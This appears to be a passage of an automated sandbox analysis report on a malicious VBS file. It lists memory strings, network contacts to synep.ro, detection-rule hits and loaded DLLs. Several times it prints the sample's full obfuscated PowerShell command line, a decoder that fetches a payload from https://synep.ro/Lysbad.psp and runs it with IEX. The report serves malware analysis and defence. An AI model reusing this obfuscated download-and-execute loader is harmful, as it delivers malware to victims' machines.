Source: powershell.exe, 00000006.00000002.3326639658.0000000004977000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000004.00000002.2161420250.0000028015C11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3326639658.0000000004821000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000004.00000002.2161420250.000002801798D000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://synep.ro
Source: powershell.exe, 00000006.00000002.3326639658.0000000004977000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000004.00000002.2161420250.0000028015C11000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000006.00000002.3326639658.0000000004821000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000006.00000002.3340409959.0000000005886000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000006.00000002.3340409959.0000000005886000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000006.00000002.3340409959.0000000005886000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000006.00000002.3326639658.0000000004977000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000004.00000002.2161420250.00000280167C9000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://go.micro
Source: powershell.exe, 00000004.00000002.2187936200.0000028025C7E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3340409959.0000000005886000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000004.00000002.2161420250.00000280171C9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2161420250.0000028015E38000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://synep.ro
Source: powershell.exe, 00000004.00000002.2161420250.0000028015E38000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://synep.ro/Lysbad.pspP
Source: powershell.exe, 00000006.00000002.3326639658.0000000004977000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://synep.ro/Lysbad.pspXR
Source: unknown, Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown, HTTPS traffic detected: 31.14.12.249:443 -> 192.168.2.5:49704 version: TLS 1.2

              System Summary

Source: amsi32_3228.amsi.csv, type: OTHER, Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution, Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 3136, type: MEMORYSTR, Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution, Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 3228, type: MEMORYSTR, Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution, Author: ditekSHen
Source: C:\Windows\System32\wscript.exe, COM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}
Source: C:\Windows\System32\wscript.exe, COM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}
Source: C:\Windows\System32\wscript.exe, COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Stelography Boligministerielt Surterhvervet Polenkas #>;$Genforeningerne='Brasilianske';<#Decoloriser Quatrains dksmands Rentabelt #>;$Stvregne=$Orlos+$host.UI; function Udgangstilladelsernes($Lupulus){If ($Stvregne) {$setaria++;}$Revest=$Velkomstens74+$Lupulus.'Length'-$setaria; for( $Kropsvisiteret=4;$Kropsvisiteret -lt $Revest;$Kropsvisiteret+=5){$Spoilage=$Kropsvisiteret;$Salvelsesfuldest+=$Lupulus[$Kropsvisiteret];$Prototraitor='Kronvildtjagterne';}$Salvelsesfuldest;}function Skilleliniens($Knothead){ & ($Toilettaskens) ($Knothead);}$Tastetryk=Udgangstilladelsernes 'guttM ndsoUn uzPoliiCanal I clvotaaDavi/ Pen ';$Tastetryk+=Udgangstilladelsernes 'Quar5Skyd.mine0Love Ski.(Li nWFejliMul nFabrdudklo NanwF.ans a,a ProcNB,geT,lie Stem1Udru0 Dr,.Roug0Raci;Phra OffiWCensiRiddnNatu6Oakl4Be i;Ne.r FenaxOver6Ea t4Ur n;Nume UrinrGyptvFili:sta,1 Eff3Dest1Clee.Disa0Tred)Fi a HandG noneYellcJustk Siso,rep/Frod2 Sto0H.ms1Stil0Gest0 P.o1Cert0Wi t1Buri DyreFSelviDubbr G,ueH,mpf tr oUmorxL,du/Defl1conv3Post1N ws.Sikk0 Bog ';$Cellerne=Udgangstilladelsernes 'EmbrUO bys OppeQuarrErog-surfA ukkgBro E ivsN fortigna ';$Konstruktivt=Udgangstilladelsernes 'Gru.haf,at ArttB depKachsHoo,:Flit/Be.a/ GamsBatiyH lvnDeuteMa ipFinu.Fl trTohaoBef./SkosLQuacySpecsActib trgaSandd vov. 
PaupStr sS,anpSkij ';$Kropsvisiteretndarbejde97=Udgangstilladelsernes 'Olde>Gang ';$Toilettaskens=Udgangstilladelsernes ' ympI .ree Sa.x Raf ';$Lykkejgers='Spendynr';$Proconscriptive='\Udviklingsegnes.sep';Skilleliniens (Udgangstilladelsernes ' npa$Fuyeg Cu le,acoNaivbFinaAAkvaLTr,n:O.lltCytoAIdeamFra B Ud UUn,rRChicSBlse=Ozon$ kreSkanNP lwvGlas: staA St PWordP La D AliASn.wt P.laU,fr+trau$frynpGnisr ,enoAppecDuelO.enenKgeusF.rhC r nrOarliclump FleTswo iLym.vRefeETysk ');Skilleliniens (Udgangstilladelsernes 'Arbe$Forbg PenlHandoMinuBFackaLa sL Bil: UnmKgardOIndod eneELan k aresA skEK.ogrOml.=Bajo$Kl pknarcoCraiNSy gSChert PrerUnusUPr.lKPrint s aI ealvsammTAkti.AnidsChe,pThyml N nIOpe.TTrun(Hoo $svinkUn.orChecO no pTilfS F,rVSvinifadeS .ryiBeriTStroeAntiR .elEnoncTskifN FerDForpa.ildRGipsBSan eDampj ForDMelaEJor 9Disi7Insi)Star ');Skilleliniens (Udgangstilladelsernes ' Nov[,ufonfjldE RovtEjen.SextshunkE Marr Genv .kki C,nCDi heBronP,kspoGadiIFrowNtndit,algMInf AEkspNVeneABallg UngeFastr Gre]Wa.r:U,co: molSApplE KogC ,unuAnteRReaniDm,iT CarYKrafp E.er nheoGardtLauroTahacCivioNighLLump Rang=Outb ,usk[ StaN A.hE Ovet Wif.GcelSFormeBondc,andUS ilRArtoI ukkTToroYParoPdolorSubpOPreitcheeoFrieCSrskOLserl OddTunfoYD ospSkypeEksp]Sg f: amm:Dry,tPomeLaddos nab1Dila2 le ');$Konstruktivt=$Kodekser[0];$Slbemaalsflyvningens=(Udgangstilladelsernes 'Buat$,utwgVineLLs lO ,aaBMuriaGravLT.ia:up om TusEDrabsNondOPoluSDat.TRoofeSperTGarrHVir,i racuEmpimBol,= OstNAndre K sW Da -S orODefebNonpj phEFedeC N dTpara BadeSPermYLmleS enotfiltEPretmHj i. F rnWin eMar.T Rec. llewPosteAgnobKarmcu
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess Stats: CPU usage > 49%
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FF848BDB1064_2_00007FF848BDB106
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FF848BDBEB24_2_00007FF848BDBEB2
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_0456EDF06_2_0456EDF0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_0456F6C06_2_0456F6C0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_0456EAA86_2_0456EAA8
              Source: O1CZjzItH1.vbsInitial sample: Strings found which are bigger than 50
              Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 6448
              Source: unknownProcess created: Commandline size = 6448
              Source: amsi32_3228.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 3136, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 3228, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: classification engineClassification label: mal100.troj.expl.evad.winVBS@9/7@2/1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Udviklingsegnes.sep
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6152:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2228:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6380:120:WilError_03
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tgahyxoc.kig.ps1
              Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\O1CZjzItH1.vbs"
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process Where Name = 'windsock.exe'
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=3136
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=3228
              Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.ini
              Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: O1CZjzItH1.vbsReversingLabs: Detection: 28%
              Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\O1CZjzItH1.vbs"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\PING.EXE ping gormezl_6777.6777.6777.677e
              Source: C:\Windows\System32\PING.EXEProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Stelography Boligministerielt Surterhvervet Polenkas #>;$Genforeningerne='Brasilianske';<#Decoloriser Quatrains dksmands Rentabelt #>;$Stvregne=$Orlos+$host.UI; function Udgangstilladelsernes($Lupulus){If ($Stvregne) {$setaria++;}$Revest=$Velkomstens74+$Lupulus.'Length'-$setaria; for( $Kropsvisiteret=4;$Kropsvisiteret -lt $Revest;$Kropsvisiteret+=5){$Spoilage=$Kropsvisiteret;$Salvelsesfuldest+=$Lupulus[$Kropsvisiteret];$Prototraitor='Kronvildtjagterne';}$Salvelsesfuldest;}function Skilleliniens($Knothead){ & ($Toilettaskens) ($Knothead);}$Tastetryk=Udgangstilladelsernes 'guttM ndsoUn uzPoliiCanal I clvotaaDavi/ Pen ';$Tastetryk+=Udgangstilladelsernes 'Quar5Skyd.mine0Love Ski.(Li nWFejliMul nFabrdudklo NanwF.ans a,a ProcNB,geT,lie Stem1Udru0 Dr,.Roug0Raci;Phra OffiWCensiRiddnNatu6Oakl4Be i;Ne.r FenaxOver6Ea t4Ur n;Nume UrinrGyptvFili:sta,1 Eff3Dest1Clee.Disa0Tred)Fi a HandG noneYellcJustk Siso,rep/Frod2 Sto0H.ms1Stil0Gest0 P.o1Cert0Wi t1Buri DyreFSelviDubbr G,ueH,mpf tr oUmorxL,du/Defl1conv3Post1N ws.Sikk0 Bog ';$Cellerne=Udgangstilladelsernes 'EmbrUO bys OppeQuarrErog-surfA ukkgBro E ivsN fortigna ';$Konstruktivt=Udgangstilladelsernes 'Gru.haf,at ArttB depKachsHoo,:Flit/Be.a/ GamsBatiyH lvnDeuteMa ipFinu.Fl trTohaoBef./SkosLQuacySpecsActib trgaSandd vov. 
PaupStr sS,anpSkij ';$Kropsvisiteretndarbejde97=Udgangstilladelsernes 'Olde>Gang ';$Toilettaskens=Udgangstilladelsernes ' ympI .ree Sa.x Raf ';$Lykkejgers='Spendynr';$Proconscriptive='\Udviklingsegnes.sep';Skilleliniens (Udgangstilladelsernes ' npa$Fuyeg Cu le,acoNaivbFinaAAkvaLTr,n:O.lltCytoAIdeamFra B Ud UUn,rRChicSBlse=Ozon$ kreSkanNP lwvGlas: staA St PWordP La D AliASn.wt P.laU,fr+trau$frynpGnisr ,enoAppecDuelO.enenKgeusF.rhC r nrOarliclump FleTswo iLym.vRefeETysk ');Skilleliniens (Udgangstilladelsernes 'Arbe$Forbg PenlHandoMinuBFackaLa sL Bil: UnmKgardOIndod eneELan k aresA skEK.ogrOml.=Bajo$Kl pknarcoCraiNSy gSChert PrerUnusUPr.lKPrint s aI ealvsammTAkti.AnidsChe,pThyml N nIOpe.TTrun(Hoo $svinkUn.orChecO no pTilfS F,rVSvinifadeS .ryiBeriTStroeAntiR .elEnoncTskifN FerDForpa.ildRGipsBSan eDampj ForDMelaEJor 9Disi7Insi)Star ');Skilleliniens (Udgangstilladelsernes ' Nov[,ufonfjldE RovtEjen.SextshunkE Marr Genv .kki C,nCDi heBronP,kspoGadiIFrowNtndit,algMInf AEkspNVeneABallg UngeFastr Gre]Wa.r:U,co: molSApplE KogC ,unuAnteRReaniDm,iT CarYKrafp E.er nheoGardtLauroTahacCivioNighLLump Rang=Outb ,usk[ StaN A.hE Ovet Wif.GcelSFormeBondc,andUS ilRArtoI ukkTToroYParoPdolorSubpOPreitcheeoFrieCSrskOLserl OddTunfoYD ospSkypeEksp]Sg f: amm:Dry,tPomeLaddos nab1Dila2 le ');$Konstruktivt=$Kodekser[0];$Slbemaalsflyvningens=(Udgangstilladelsernes 'Buat$,utwgVineLLs lO ,aaBMuriaGravLT.ia:up om TusEDrabsNondOPoluSDat.TRoofeSperTGarrHVir,i racuEmpimBol,= OstNAndre K sW Da -S orODefebNonpj phEFedeC N dTpara BadeSPermYLmleS enotfiltEPretmHj i. F rnWin eMar.T Rec. llewPosteAgnobKarmcu
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Stelography Boligministerielt Surterhvervet Polenkas #>;$Genforeningerne='Brasilianske';<#Decoloriser Quatrains dksmands Rentabelt #>;$Stvregne=$Orlos+$host.UI; function Udgangstilladelsernes($Lupulus){If ($Stvregne) {$setaria++;}$Revest=$Velkomstens74+$Lupulus.'Length'-$setaria; for( $Kropsvisiteret=4;$Kropsvisiteret -lt $Revest;$Kropsvisiteret+=5){$Spoilage=$Kropsvisiteret;$Salvelsesfuldest+=$Lupulus[$Kropsvisiteret];$Prototraitor='Kronvildtjagterne';}$Salvelsesfuldest;}function Skilleliniens($Knothead){ & ($Toilettaskens) ($Knothead);}$Tastetryk=Udgangstilladelsernes 'guttM ndsoUn uzPoliiCanal I clvotaaDavi/ Pen ';$Tastetryk+=Udgangstilladelsernes 'Quar5Skyd.mine0Love Ski.(Li nWFejliMul nFabrdudklo NanwF.ans a,a ProcNB,geT,lie Stem1Udru0 Dr,.Roug0Raci;Phra OffiWCensiRiddnNatu6Oakl4Be i;Ne.r FenaxOver6Ea t4Ur n;Nume UrinrGyptvFili:sta,1 Eff3Dest1Clee.Disa0Tred)Fi a HandG noneYellcJustk Siso,rep/Frod2 Sto0H.ms1Stil0Gest0 P.o1Cert0Wi t1Buri DyreFSelviDubbr G,ueH,mpf tr oUmorxL,du/Defl1conv3Post1N ws.Sikk0 Bog ';$Cellerne=Udgangstilladelsernes 'EmbrUO bys OppeQuarrErog-surfA ukkgBro E ivsN fortigna ';$Konstruktivt=Udgangstilladelsernes 'Gru.haf,at ArttB depKachsHoo,:Flit/Be.a/ GamsBatiyH lvnDeuteMa ipFinu.Fl trTohaoBef./SkosLQuacySpecsActib trgaSandd vov. 
PaupStr sS,anpSkij ';$Kropsvisiteretndarbejde97=Udgangstilladelsernes 'Olde>Gang ';$Toilettaskens=Udgangstilladelsernes ' ympI .ree Sa.x Raf ';$Lykkejgers='Spendynr';$Proconscriptive='\Udviklingsegnes.sep';Skilleliniens (Udgangstilladelsernes ' npa$Fuyeg Cu le,acoNaivbFinaAAkvaLTr,n:O.lltCytoAIdeamFra B Ud UUn,rRChicSBlse=Ozon$ kreSkanNP lwvGlas: staA St PWordP La D AliASn.wt P.laU,fr+trau$frynpGnisr ,enoAppecDuelO.enenKgeusF.rhC r nrOarliclump FleTswo iLym.vRefeETysk ');Skilleliniens (Udgangstilladelsernes 'Arbe$Forbg PenlHandoMinuBFackaLa sL Bil: UnmKgardOIndod eneELan k aresA skEK.ogrOml.=Bajo$Kl pknarcoCraiNSy gSChert PrerUnusUPr.lKPrint s aI ealvsammTAkti.AnidsChe,pThyml N nIOpe.TTrun(Hoo $svinkUn.orChecO no pTilfS F,rVSvinifadeS .ryiBeriTStroeAntiR .elEnoncTskifN FerDForpa.ildRGipsBSan eDampj ForDMelaEJor 9Disi7Insi)Star ');Skilleliniens (Udgangstilladelsernes ' Nov[,ufonfjldE RovtEjen.SextshunkE Marr Genv .kki C,nCDi heBronP,kspoGadiIFrowNtndit,algMInf AEkspNVeneABallg UngeFastr Gre]Wa.r:U,co: molSApplE KogC ,unuAnteRReaniDm,iT CarYKrafp E.er nheoGardtLauroTahacCivioNighLLump Rang=Outb ,usk[ StaN A.hE Ovet Wif.GcelSFormeBondc,andUS ilRArtoI ukkTToroYParoPdolorSubpOPreitcheeoFrieCSrskOLserl OddTunfoYD ospSkypeEksp]Sg f: amm:Dry,tPomeLaddos nab1Dila2 le ');$Konstruktivt=$Kodekser[0];$Slbemaalsflyvningens=(Udgangstilladelsernes 'Buat$,utwgVineLLs lO ,aaBMuriaGravLT.ia:up om TusEDrabsNondOPoluSDat.TRoofeSperTGarrHVir,i racuEmpimBol,= OstNAndre K sW Da -S orODefebNonpj phEFedeC N dTpara BadeSPermYLmleS enotfiltEPretmHj i. F rnWin eMar.T Rec. llewPosteAgnobKarmcu
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\PING.EXE ping gormezl_6777.6777.6777.677e
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Stelography Boligministerielt Surterhvervet Polenkas #>;$Genforeningerne='Brasilianske';<#Decoloriser Quatrains dksmands Rentabelt #>;$Stvregne=$Orlos+$host.UI; function Udgangstilladelsernes($Lupulus){If ($Stvregne) {$setaria++;}$Revest=$Velkomstens74+$Lupulus.'Length'-$setaria; for( $Kropsvisiteret=4;$Kropsvisiteret -lt $Revest;$Kropsvisiteret+=5){$Spoilage=$Kropsvisiteret;$Salvelsesfuldest+=$Lupulus[$Kropsvisiteret];$Prototraitor='Kronvildtjagterne';}$Salvelsesfuldest;}function Skilleliniens($Knothead){ & ($Toilettaskens) ($Knothead);}$Tastetryk=Udgangstilladelsernes 'guttM ndsoUn uzPoliiCanal I clvotaaDavi/ Pen ';$Tastetryk+=Udgangstilladelsernes 'Quar5Skyd.mine0Love Ski.(Li nWFejliMul nFabrdudklo NanwF.ans a,a ProcNB,geT,lie Stem1Udru0 Dr,.Roug0Raci;Phra OffiWCensiRiddnNatu6Oakl4Be i;Ne.r FenaxOver6Ea t4Ur n;Nume UrinrGyptvFili:sta,1 Eff3Dest1Clee.Disa0Tred)Fi a HandG noneYellcJustk Siso,rep/Frod2 Sto0H.ms1Stil0Gest0 P.o1Cert0Wi t1Buri DyreFSelviDubbr G,ueH,mpf tr oUmorxL,du/Defl1conv3Post1N ws.Sikk0 Bog ';$Cellerne=Udgangstilladelsernes 'EmbrUO bys OppeQuarrErog-surfA ukkgBro E ivsN fortigna ';$Konstruktivt=Udgangstilladelsernes 'Gru.haf,at ArttB depKachsHoo,:Flit/Be.a/ GamsBatiyH lvnDeuteMa ipFinu.Fl trTohaoBef./SkosLQuacySpecsActib trgaSandd vov. 
PaupStr sS,anpSkij ';$Kropsvisiteretndarbejde97=Udgangstilladelsernes 'Olde>Gang ';$Toilettaskens=Udgangstilladelsernes ' ympI .ree Sa.x Raf ';$Lykkejgers='Spendynr';$Proconscriptive='\Udviklingsegnes.sep';Skilleliniens (Udgangstilladelsernes ' npa$Fuyeg Cu le,acoNaivbFinaAAkvaLTr,n:O.lltCytoAIdeamFra B Ud UUn,rRChicSBlse=Ozon$ kreSkanNP lwvGlas: staA St PWordP La D AliASn.wt P.laU,fr+trau$frynpGnisr ,enoAppecDuelO.enenKgeusF.rhC r nrOarliclump FleTswo iLym.vRefeETysk ');Skilleliniens (Udgangstilladelsernes 'Arbe$Forbg PenlHandoMinuBFackaLa sL Bil: UnmKgardOIndod eneELan k aresA skEK.ogrOml.=Bajo$Kl pknarcoCraiNSy gSChert PrerUnusUPr.lKPrint s aI ealvsammTAkti.AnidsChe,pThyml N nIOpe.TTrun(Hoo $svinkUn.orChecO no pTilfS F,rVSvinifadeS .ryiBeriTStroeAntiR .elEnoncTskifN FerDForpa.ildRGipsBSan eDampj ForDMelaEJor 9Disi7Insi)Star ');Skilleliniens (Udgangstilladelsernes ' Nov[,ufonfjldE RovtEjen.SextshunkE Marr Genv .kki C,nCDi heBronP,kspoGadiIFrowNtndit,algMInf AEkspNVeneABallg UngeFastr Gre]Wa.r:U,co: molSApplE KogC ,unuAnteRReaniDm,iT CarYKrafp E.er nheoGardtLauroTahacCivioNighLLump Rang=Outb ,usk[ StaN A.hE Ovet Wif.GcelSFormeBondc,andUS ilRArtoI ukkTToroYParoPdolorSubpOPreitcheeoFrieCSrskOLserl OddTunfoYD ospSkypeEksp]Sg f: amm:Dry,tPomeLaddos nab1Dila2 le ');$Konstruktivt=$Kodekser[0];$Slbemaalsflyvningens=(Udgangstilladelsernes 'Buat$,utwgVineLLs lO ,aaBMuriaGravLT.ia:up om TusEDrabsNondOPoluSDat.TRoofeSperTGarrHVir,i racuEmpimBol,= OstNAndre K sW Da -S orODefebNonpj phEFedeC N dTpara BadeSPermYLmleS enotfiltEPretmHj i. F rnWin eMar.T Rec. llewPosteAgnobKarmcu
              Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: slc.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dll
              Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dll
              Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dll
              Source: C:\Windows\System32\PING.EXESection loaded: dnsapi.dll
              Source: C:\Windows\System32\PING.EXESection loaded: rasadhlp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
